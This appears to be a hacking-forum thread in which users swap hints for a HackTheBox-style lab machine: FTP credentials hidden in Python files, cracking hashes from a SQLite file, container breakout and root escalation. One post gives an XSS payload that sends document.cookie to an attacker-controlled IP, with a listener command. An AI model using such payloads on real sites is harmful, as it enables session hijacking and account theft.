Possibly Related Threads…

meoami · 04-28-2024, 02:05 PM

(04-28-2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>

Wait listening with python3 -m http.server

---

I'm stucked now as root inside a container. Does anyone know how to breakout?

how can you get inside the container? i got password and login session but no idea..

query1338 · 04-28-2024, 02:05 PM

OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

osamy7593 · 04-28-2024, 02:36 PM

(04-28-2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds

query1338 · 04-28-2024, 02:40 PM

(04-28-2024, 02:36 PM)osamy7593 Wrote:
(04-28-2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds

you can find them by getting the pyhon files.

mur · 04-28-2024, 02:55 PM

(04-28-2024, 02:40 PM)query1338 Wrote:
(04-28-2024, 02:36 PM)osamy7593 Wrote:
(04-28-2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds

you can find them by getting the pyhon files.

Apart from app.py, which one?

query1338 · 04-28-2024, 03:03 PM

(04-28-2024, 02:55 PM)mur Wrote:
(04-28-2024, 02:40 PM)query1338 Wrote:
(04-28-2024, 02:36 PM)osamy7593 Wrote:
(04-28-2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds

you can find them by getting the pyhon files.

Apart from app.py, which one?

the dashboard file

query1338 · 04-28-2024, 03:30 PM

any hints for root?

Got the user hashes from the sqlite db file, but I am unable to crack the hash for adam... If this is the way please tell me how to crack it.

AbsolutelyMadProc · 04-28-2024, 03:32 PM

(04-28-2024, 03:30 PM)query1338 Wrote: any hints for root?

Got the user hashes from the sqlite db file, but I am unable to crack the hash for adam... If this is the way please tell me how to crack it.

I cracked the hash, but it seems like it is only usable for the reports page

meoami · 04-28-2024, 03:46 PM

any hints for root?

anon54321 · 04-28-2024, 04:03 PM

once we have the ftp creds, what to do with them? I cant seem to connect to ftp, any hints?

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	360	88,710	03-28-2026, 09:28 AM Last Post: catsweet
	[FREE] HTB-ProLabs APTLABS Just Flags	kewlsunny	23	2,348	03-28-2026, 03:30 AM Last Post: lulaladrow
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	87	7,490	03-27-2026, 07:22 PM Last Post: stn
	HTB Eloquia User and Root Flags - Insane Box	69646B	13	350	03-27-2026, 06:14 PM Last Post: vlxw
	HTB - ALL Challenges you Stuck in	osamy7593	2	646	03-27-2026, 04:24 PM Last Post: catsweet